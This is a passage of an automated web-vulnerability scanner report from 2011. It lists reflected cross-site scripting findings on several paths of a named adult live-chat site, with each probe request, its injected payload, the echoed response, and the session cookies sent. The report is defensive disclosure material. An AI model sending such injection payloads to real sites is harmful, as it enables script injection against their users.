Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:00 GMT
Connection: close
Content-Length: 195797
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1">
...[SNIP]...

2.90. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4cfa'-alert(1)-'0c9972c192e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:28 GMT
Connection: close
Content-Length: 195962
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.91. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/guy-alone/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b427'-alert(1)-'a0cb4a3aa6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:39 GMT
Connection: close
Content-Length: 70611
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.92. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/guy-alone/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b77"><a>0945077855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/guy-alone/?88b77"><a>0945077855=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:25 GMT
Connection: close
Content-Length: 70405
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/guy-alone/?88b77"><a>0945077855=1">
...[SNIP]...

2.93. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/happyhour/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f8e'-alert(1)-'12b8116e5e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:38 GMT
Connection: close
Content-Length: 22962
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.94. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/happyhour/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f3c"><a>aec254de933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/happyhour/?82f3c"><a>aec254de933=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:15 GMT
Connection: close
Content-Length: 22814
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/happyhour/?82f3c"><a>aec254de933=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.95. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c06bb'-alert(1)-'229e135fe5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:07 GMT
Connection: close
Content-Length: 119630
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

2.96. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95de2"><a>dfcf1a79259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:50 GMT
Connection: close
Content-Length: 119446
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1">
...[SNIP]...

2.97. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799a4'-alert(1)-'5a8a05031a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
